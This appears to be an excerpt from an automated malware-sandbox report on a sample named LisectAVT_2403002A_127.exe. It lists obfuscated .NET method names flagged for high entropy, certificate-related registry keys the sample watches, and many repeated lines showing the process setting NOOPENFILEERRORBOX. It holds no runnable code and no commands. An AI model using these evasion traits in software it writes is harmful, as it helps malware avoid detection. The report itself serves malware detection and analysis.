Source: 0.2.LisectAVT_2403002A_127.exe.7c80000.8.raw.unpack, md1b4YpvsopcyTG0K9.cs	High entropy of concatenated method names: 'e9XetV0sq', 'O6i1U5xFi', 'XXOEanaRY', 'xPe3F6cs5', 'NP8ZiDEjS', 'EBWaYJrL8', 'fWV07D8Ze4EXaq5gmH', 'sNjZ5KaJOMypsC6u6V', 'r5DSvC5cP', 'qQayyahym'
Source: 0.2.LisectAVT_2403002A_127.exe.7c80000.8.raw.unpack, uhdXDir4lKqJA5L4Sp.cs	High entropy of concatenated method names: 'A7vMT4BgEO', 'vhxMGLB6k6', 'NteMxIB5ws', 'bfVM5mkOfU', 'GEyMkRRgUu', 'XJuMCFnZbR', 'v45MBvlXIE', 'lIsMPcMPFj', 'zpxM4CZTdk', 'r7uMwwUZfF'
Source: 0.2.LisectAVT_2403002A_127.exe.7c80000.8.raw.unpack, klmAZ8HTeMLVuJRsAH.cs	High entropy of concatenated method names: 'Xy1xKSBOe2', 'kcNxHXalOR', 'NLNxLdeeye', 'S1jxpsgdBe', 'fkIxqgDaW2', 'QDgxjnFsaY', 'V4MxQCKLBJ', 'pW5xX3SiNJ', 'Nigxm041ZV', 'v7AxVnoIRU'
Source: 0.2.LisectAVT_2403002A_127.exe.7c80000.8.raw.unpack, Odwx2LjYANljE05Rb8.cs	High entropy of concatenated method names: 'ToString', 'kXot9FUpm4', 'nbqtDL6yee', 'wIrt2EsOiT', 'RVptY1LD9G', 'BOGtoRkIWh', 'nMetssyPBT', 'kP3tUBwjvH', 'DBEtc3qCi1', 'ko6tNUjGFH'
Source: 0.2.LisectAVT_2403002A_127.exe.7c80000.8.raw.unpack, AX1Xgv4D1Q2EKuupqj.cs	High entropy of concatenated method names: 'Ai3Fb0VorA', 'WOVFZ8Jmxb', 'CSOFJtkspK', 'CC1FDPYNUc', 'himFYoux7j', 'BF5FotB6mC', 'Jg4FUTi5J7', 'EfkFcXxG2w', 'QEGF8d2k5f', 'ewXF9caTmx'
Source: 0.2.LisectAVT_2403002A_127.exe.7c80000.8.raw.unpack, sWdKaCOIM2sgOvHeej.cs	High entropy of concatenated method names: 'b0XBf5k8oN', 'DsCBRXWdoS', 'pG8BemC6Xd', 'iufB1oCKtI', 'ro3BO3sl8j', 'PI1BEiWtCR', 'AJVB30SnKp', 'LFNBbYGE9o', 'PQ7BZiMH6g', 'drCBaat4a0'
Source: 0.2.LisectAVT_2403002A_127.exe.7c80000.8.raw.unpack, pWNYPZ5V9av2f1UrTvd.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'zlFyKislS5', 'W7uyHQxOwY', 'udayLkexRT', 'eCOypfnF7t', 'DO1yqYFbML', 'CUMyjZ8X8R', 'fFhyQ8KDkG'
Source: 0.2.LisectAVT_2403002A_127.exe.7c80000.8.raw.unpack, wMJB2RQRit9u0tKky6.cs	High entropy of concatenated method names: 'xxTIwDVOTD', 'D4IIrdvact', 'ToString', 'LCQIGPjEU7', 'RTwIxfMai0', 'cZgI5CsuGI', 'KbAIkGviec', 'WAWIC7guxt', 'YivIBoQHlq', 'kBxIPE47H9'
Source: 0.2.LisectAVT_2403002A_127.exe.7c80000.8.raw.unpack, ftvGXn5aX1cl3NfwNG9.cs	High entropy of concatenated method names: 'gkk6f3VFlx', 'zbd6RNQBTX', 'Sbh6exKZgY', 'BPn617MX6h', 'mjb6O1UUsD', 'Oab6EkdgUL', 'eta63XKAAN', 'jo66bfyjyu', 'm5u6ZMX6NR', 'e426aa48U6'
Source: 0.2.LisectAVT_2403002A_127.exe.7c80000.8.raw.unpack, iaZwSv7NUZ7lnset1d.cs	High entropy of concatenated method names: 'morCTbZ37O', 'nvwCxJgxeq', 'uovCkuI2Dc', 'PgJCBmcl7a', 'EEJCPGDXKk', 'u2OkqZGrpM', 'nxakjt8g4f', 'GivkQMoYBc', 'oajkXhnsCN', 'MJckmZBgOg'
Source: 0.2.LisectAVT_2403002A_127.exe.7c80000.8.raw.unpack, Cro2EFbkj2fvPZbku3.cs	High entropy of concatenated method names: 'vnl6uj0Wu4', 'vxl6MZZoj7', 'gMm67Dnuyd', 'NbU6G9ZpKS', 'D156xFOCsB', 'fBr6kQJFQT', 'XoF6CvvlEU', 'O7ESQZWOst', 'jPeSXj6KXl', 'Gc3SmUI2fH'
Source: 0.2.LisectAVT_2403002A_127.exe.7c80000.8.raw.unpack, kR6xFVcWjByQkEUqC9.cs	High entropy of concatenated method names: 'Dispose', 'PNxumD58lP', 'rmChD72DZm', 'KTHddUYMU3', 'GDCuV5YNgN', 'xoXuzXEfed', 'ProcessDialogKey', 'FBIhvfVLhw', 'w61hu2dTS1', 'FZqhhSwIkh'
Source: 0.2.LisectAVT_2403002A_127.exe.7c80000.8.raw.unpack, ajUyEO0gYae1kdByrk.cs	High entropy of concatenated method names: 'U5pIXQYXC5', 'm3SIVrrGRZ', 'EiLSvZJZoX', 'LI8SuLHTaE', 'DWWI9kdOEM', 'A6wIib3TkX', 'EQ6In2EBrL', 'r5fIKpiEHP', 'DERIHvrney', 'e08ILEML5p'
Source: 0.2.LisectAVT_2403002A_127.exe.7c80000.8.raw.unpack, mcP8dfxCsy0XIot8V2.cs	High entropy of concatenated method names: 'KdR51LjgZq', 'DyD5EDefN0', 'UXC5bDqeFl', 'DiX5ZgAmde', 'fqe5gJ5oAg', 'PRS5tC4QlC', 'Gqk5IoXpHu', 'X3Q5SbwIEA', 'Vob56v3OnS', 'jZa5ynRhZC'
Source: 0.2.LisectAVT_2403002A_127.exe.7c80000.8.raw.unpack, erqSUTsy0FA1KhqLIs.cs	High entropy of concatenated method names: 'pEQuBkUejR', 'VBPuP0JLvt', 'vwjuwLv0y1', 'RHourNLG43', 'sTjugV521J', 'T07utB3lao', 'RItiAfCBvB5x6h7b5a', 'Nw9PSvAv655kLoFC4J', 'NJVFWi7LBvbvj7Z3Bu', 'kruuuxuqkh'
Source: 0.2.LisectAVT_2403002A_127.exe.7c80000.8.raw.unpack, OoFyZfoyccIPM6eUm3.cs	High entropy of concatenated method names: 'DJpSG05kw7', 'A6gSx4vgYy', 'k3TS5lAbbm', 'tXVSkXvI8X', 'tsZSCvym87', 'RVkSBX8367', 'Le3SPY1Ffm', 'UgLS485LXE', 'lwlSwm1Vj2', 'E9eSrl0NCk'
Source: 0.2.LisectAVT_2403002A_127.exe.7c80000.8.raw.unpack, W2xqs255xweGuk9IvRb.cs	High entropy of concatenated method names: 'ToString', 'LfOyMiVwAd', 'buPy7bvvAd', 'MIIyTCh6Ls', 'Q1XyGTmcTm', 'w3fyxbZQxq', 'wlAy5318VN', 'knhykJUyQV', 'Pwkoa3jai4QaaQF4vGg', 'HNkQMGjbjWh4TEenjmJ'
Source: 0.2.LisectAVT_2403002A_127.exe.7c80000.8.raw.unpack, kdFuKdGJyNY9AlcONn.cs	High entropy of concatenated method names: 'UA1g8fJH8V', 'a4wgijuDJx', 'v50gK0G6Up', 'w4DgHFunli', 'eFxgD9LyN1', 'K0dg2A78nN', 'vGJgYkmwrk', 'fb7goxEf84', 'WPdgsAoLhO', 're9gUfpgjY'
Source: 0.2.LisectAVT_2403002A_127.exe.7c80000.8.raw.unpack, rYxoLNI0oTSuT0iyWI.cs	High entropy of concatenated method names: 'dDsBGWkORU', 'cq2B5brhxX', 'yTRBCMwHLe', 'sOWCVDovrm', 'rYmCz1jVn1', 'ElKBvE8gfY', 'zH9BuAAfbA', 'rxXBhEbWam', 'pZvBMg7FAJ', 'LqGB7Dv5tp'
Source: 0.2.LisectAVT_2403002A_127.exe.4334350.3.raw.unpack, md1b4YpvsopcyTG0K9.cs	High entropy of concatenated method names: 'e9XetV0sq', 'O6i1U5xFi', 'XXOEanaRY', 'xPe3F6cs5', 'NP8ZiDEjS', 'EBWaYJrL8', 'fWV07D8Ze4EXaq5gmH', 'sNjZ5KaJOMypsC6u6V', 'r5DSvC5cP', 'qQayyahym'
Source: 0.2.LisectAVT_2403002A_127.exe.4334350.3.raw.unpack, uhdXDir4lKqJA5L4Sp.cs	High entropy of concatenated method names: 'A7vMT4BgEO', 'vhxMGLB6k6', 'NteMxIB5ws', 'bfVM5mkOfU', 'GEyMkRRgUu', 'XJuMCFnZbR', 'v45MBvlXIE', 'lIsMPcMPFj', 'zpxM4CZTdk', 'r7uMwwUZfF'
Source: 0.2.LisectAVT_2403002A_127.exe.4334350.3.raw.unpack, klmAZ8HTeMLVuJRsAH.cs	High entropy of concatenated method names: 'Xy1xKSBOe2', 'kcNxHXalOR', 'NLNxLdeeye', 'S1jxpsgdBe', 'fkIxqgDaW2', 'QDgxjnFsaY', 'V4MxQCKLBJ', 'pW5xX3SiNJ', 'Nigxm041ZV', 'v7AxVnoIRU'
Source: 0.2.LisectAVT_2403002A_127.exe.4334350.3.raw.unpack, Odwx2LjYANljE05Rb8.cs	High entropy of concatenated method names: 'ToString', 'kXot9FUpm4', 'nbqtDL6yee', 'wIrt2EsOiT', 'RVptY1LD9G', 'BOGtoRkIWh', 'nMetssyPBT', 'kP3tUBwjvH', 'DBEtc3qCi1', 'ko6tNUjGFH'
Source: 0.2.LisectAVT_2403002A_127.exe.4334350.3.raw.unpack, AX1Xgv4D1Q2EKuupqj.cs	High entropy of concatenated method names: 'Ai3Fb0VorA', 'WOVFZ8Jmxb', 'CSOFJtkspK', 'CC1FDPYNUc', 'himFYoux7j', 'BF5FotB6mC', 'Jg4FUTi5J7', 'EfkFcXxG2w', 'QEGF8d2k5f', 'ewXF9caTmx'
Source: 0.2.LisectAVT_2403002A_127.exe.4334350.3.raw.unpack, sWdKaCOIM2sgOvHeej.cs	High entropy of concatenated method names: 'b0XBf5k8oN', 'DsCBRXWdoS', 'pG8BemC6Xd', 'iufB1oCKtI', 'ro3BO3sl8j', 'PI1BEiWtCR', 'AJVB30SnKp', 'LFNBbYGE9o', 'PQ7BZiMH6g', 'drCBaat4a0'
Source: 0.2.LisectAVT_2403002A_127.exe.4334350.3.raw.unpack, pWNYPZ5V9av2f1UrTvd.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'zlFyKislS5', 'W7uyHQxOwY', 'udayLkexRT', 'eCOypfnF7t', 'DO1yqYFbML', 'CUMyjZ8X8R', 'fFhyQ8KDkG'
Source: 0.2.LisectAVT_2403002A_127.exe.4334350.3.raw.unpack, wMJB2RQRit9u0tKky6.cs	High entropy of concatenated method names: 'xxTIwDVOTD', 'D4IIrdvact', 'ToString', 'LCQIGPjEU7', 'RTwIxfMai0', 'cZgI5CsuGI', 'KbAIkGviec', 'WAWIC7guxt', 'YivIBoQHlq', 'kBxIPE47H9'
Source: 0.2.LisectAVT_2403002A_127.exe.4334350.3.raw.unpack, ftvGXn5aX1cl3NfwNG9.cs	High entropy of concatenated method names: 'gkk6f3VFlx', 'zbd6RNQBTX', 'Sbh6exKZgY', 'BPn617MX6h', 'mjb6O1UUsD', 'Oab6EkdgUL', 'eta63XKAAN', 'jo66bfyjyu', 'm5u6ZMX6NR', 'e426aa48U6'
Source: 0.2.LisectAVT_2403002A_127.exe.4334350.3.raw.unpack, iaZwSv7NUZ7lnset1d.cs	High entropy of concatenated method names: 'morCTbZ37O', 'nvwCxJgxeq', 'uovCkuI2Dc', 'PgJCBmcl7a', 'EEJCPGDXKk', 'u2OkqZGrpM', 'nxakjt8g4f', 'GivkQMoYBc', 'oajkXhnsCN', 'MJckmZBgOg'
Source: 0.2.LisectAVT_2403002A_127.exe.4334350.3.raw.unpack, Cro2EFbkj2fvPZbku3.cs	High entropy of concatenated method names: 'vnl6uj0Wu4', 'vxl6MZZoj7', 'gMm67Dnuyd', 'NbU6G9ZpKS', 'D156xFOCsB', 'fBr6kQJFQT', 'XoF6CvvlEU', 'O7ESQZWOst', 'jPeSXj6KXl', 'Gc3SmUI2fH'
Source: 0.2.LisectAVT_2403002A_127.exe.4334350.3.raw.unpack, kR6xFVcWjByQkEUqC9.cs	High entropy of concatenated method names: 'Dispose', 'PNxumD58lP', 'rmChD72DZm', 'KTHddUYMU3', 'GDCuV5YNgN', 'xoXuzXEfed', 'ProcessDialogKey', 'FBIhvfVLhw', 'w61hu2dTS1', 'FZqhhSwIkh'
Source: 0.2.LisectAVT_2403002A_127.exe.4334350.3.raw.unpack, ajUyEO0gYae1kdByrk.cs	High entropy of concatenated method names: 'U5pIXQYXC5', 'm3SIVrrGRZ', 'EiLSvZJZoX', 'LI8SuLHTaE', 'DWWI9kdOEM', 'A6wIib3TkX', 'EQ6In2EBrL', 'r5fIKpiEHP', 'DERIHvrney', 'e08ILEML5p'
Source: 0.2.LisectAVT_2403002A_127.exe.4334350.3.raw.unpack, mcP8dfxCsy0XIot8V2.cs	High entropy of concatenated method names: 'KdR51LjgZq', 'DyD5EDefN0', 'UXC5bDqeFl', 'DiX5ZgAmde', 'fqe5gJ5oAg', 'PRS5tC4QlC', 'Gqk5IoXpHu', 'X3Q5SbwIEA', 'Vob56v3OnS', 'jZa5ynRhZC'
Source: 0.2.LisectAVT_2403002A_127.exe.4334350.3.raw.unpack, erqSUTsy0FA1KhqLIs.cs	High entropy of concatenated method names: 'pEQuBkUejR', 'VBPuP0JLvt', 'vwjuwLv0y1', 'RHourNLG43', 'sTjugV521J', 'T07utB3lao', 'RItiAfCBvB5x6h7b5a', 'Nw9PSvAv655kLoFC4J', 'NJVFWi7LBvbvj7Z3Bu', 'kruuuxuqkh'
Source: 0.2.LisectAVT_2403002A_127.exe.4334350.3.raw.unpack, OoFyZfoyccIPM6eUm3.cs	High entropy of concatenated method names: 'DJpSG05kw7', 'A6gSx4vgYy', 'k3TS5lAbbm', 'tXVSkXvI8X', 'tsZSCvym87', 'RVkSBX8367', 'Le3SPY1Ffm', 'UgLS485LXE', 'lwlSwm1Vj2', 'E9eSrl0NCk'
Source: 0.2.LisectAVT_2403002A_127.exe.4334350.3.raw.unpack, W2xqs255xweGuk9IvRb.cs	High entropy of concatenated method names: 'ToString', 'LfOyMiVwAd', 'buPy7bvvAd', 'MIIyTCh6Ls', 'Q1XyGTmcTm', 'w3fyxbZQxq', 'wlAy5318VN', 'knhykJUyQV', 'Pwkoa3jai4QaaQF4vGg', 'HNkQMGjbjWh4TEenjmJ'
Source: 0.2.LisectAVT_2403002A_127.exe.4334350.3.raw.unpack, kdFuKdGJyNY9AlcONn.cs	High entropy of concatenated method names: 'UA1g8fJH8V', 'a4wgijuDJx', 'v50gK0G6Up', 'w4DgHFunli', 'eFxgD9LyN1', 'K0dg2A78nN', 'vGJgYkmwrk', 'fb7goxEf84', 'WPdgsAoLhO', 're9gUfpgjY'
Source: 0.2.LisectAVT_2403002A_127.exe.4334350.3.raw.unpack, rYxoLNI0oTSuT0iyWI.cs	High entropy of concatenated method names: 'dDsBGWkORU', 'cq2B5brhxX', 'yTRBCMwHLe', 'sOWCVDovrm', 'rYmCz1jVn1', 'ElKBvE8gfY', 'zH9BuAAfbA', 'rxXBhEbWam', 'pZvBMg7FAJ', 'LqGB7Dv5tp'
Source: 0.2.LisectAVT_2403002A_127.exe.57e0000.6.raw.unpack, kdFvaMFVPKs73pA7Ae.cs	High entropy of concatenated method names: 'jlLbsIppcp4pe', 'HUDVafGQx3A5lYPXEbC', 'bWxlDPGFKtjOUjq8ME9', 'J13JY7Gs9VegMR0Usdn', 'gjnvHYGCPTFBSN5sXDA', 'UXn9pRGVr5JYGFjuCRJ', 'g8bQ3yGYPoLwrRusK3E', 'KwwAwLG5jtFVjgr5V0l', 'lJyLiGG0wAjthymuVo5', 'KrHGd2G9wj507LdZGDe'
Source: 0.2.LisectAVT_2403002A_127.exe.57e0000.6.raw.unpack, DD.cs	High entropy of concatenated method names: 'wgRxinKHcbWANUbFNm', 'dwveif1E9jqp4XTbTA', 'iYTXHL2SDoNZBJVsGw', 'hFySdn3keDBvJSvKal', 'PVIytPpWpuEYQLk40u'
Source: 0.2.LisectAVT_2403002A_127.exe.57e0000.6.raw.unpack, ihWImL1h2qjtIkVYDh.cs	High entropy of concatenated method names: 'qJUttacKFT', 'djwp7oGHZ8xfNf3m5ut', 'AZqALCG67UykKuowXP2', 'dkLCJpGlCfFdqtD7Epf', 'iHWSkAGjDuGN31hXJsT', 'u4UYnDGE5xCOMnt15QR', 'jhES7Va4c', 'jWmROKkjL', 'Dispose', 'BJj7gBhfp'
Source: 0.2.LisectAVT_2403002A_127.exe.57e0000.6.raw.unpack, oImfMJtvGUo8fMQNBQ.cs	High entropy of concatenated method names: 'cxsORewNJ', 'VvrninWuk', 'ustvIxt9o', 'QtXoY7g0N', 'cMKlMbnQu', 'w2KLAB5Xx', 'hNkF6TG2YCh7xU8s3hJ', 'hs4l1PGKtLhAeRnm1c4', 'Dispose', 'MoveNext'
Source: 0.2.LisectAVT_2403002A_127.exe.57e0000.6.raw.unpack, wehuuoKhMKMbnQu72K.cs	High entropy of concatenated method names: 'NXMyxc8eI', 'GTZadPHeP', 'DEVNaDCj9', 'cflmBNqev', 'VFQ0OImLC', 'PbYVMxZvt', 'UPdFjbLed', 'AeEi93ui9', 'oM66buTLn', 'nxFUIfcfn'
Source: 0.2.LisectAVT_2403002A_127.exe.2f75dd4.2.raw.unpack, kdFvaMFVPKs73pA7Ae.cs	High entropy of concatenated method names: 'jlLbsIppcp4pe', 'HUDVafGQx3A5lYPXEbC', 'bWxlDPGFKtjOUjq8ME9', 'J13JY7Gs9VegMR0Usdn', 'gjnvHYGCPTFBSN5sXDA', 'UXn9pRGVr5JYGFjuCRJ', 'g8bQ3yGYPoLwrRusK3E', 'KwwAwLG5jtFVjgr5V0l', 'lJyLiGG0wAjthymuVo5', 'KrHGd2G9wj507LdZGDe'
Source: 0.2.LisectAVT_2403002A_127.exe.2f75dd4.2.raw.unpack, DD.cs	High entropy of concatenated method names: 'wgRxinKHcbWANUbFNm', 'dwveif1E9jqp4XTbTA', 'iYTXHL2SDoNZBJVsGw', 'hFySdn3keDBvJSvKal', 'PVIytPpWpuEYQLk40u'
Source: 0.2.LisectAVT_2403002A_127.exe.2f75dd4.2.raw.unpack, ihWImL1h2qjtIkVYDh.cs	High entropy of concatenated method names: 'qJUttacKFT', 'djwp7oGHZ8xfNf3m5ut', 'AZqALCG67UykKuowXP2', 'dkLCJpGlCfFdqtD7Epf', 'iHWSkAGjDuGN31hXJsT', 'u4UYnDGE5xCOMnt15QR', 'jhES7Va4c', 'jWmROKkjL', 'Dispose', 'BJj7gBhfp'
Source: 0.2.LisectAVT_2403002A_127.exe.2f75dd4.2.raw.unpack, oImfMJtvGUo8fMQNBQ.cs	High entropy of concatenated method names: 'cxsORewNJ', 'VvrninWuk', 'ustvIxt9o', 'QtXoY7g0N', 'cMKlMbnQu', 'w2KLAB5Xx', 'hNkF6TG2YCh7xU8s3hJ', 'hs4l1PGKtLhAeRnm1c4', 'Dispose', 'MoveNext'
Source: 0.2.LisectAVT_2403002A_127.exe.2f75dd4.2.raw.unpack, wehuuoKhMKMbnQu72K.cs	High entropy of concatenated method names: 'NXMyxc8eI', 'GTZadPHeP', 'DEVNaDCj9', 'cflmBNqev', 'VFQ0OImLC', 'PbYVMxZvt', 'UPdFjbLed', 'AeEi93ui9', 'oM66buTLn', 'nxFUIfcfn'

Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate			Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot			Jump to behavior

Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
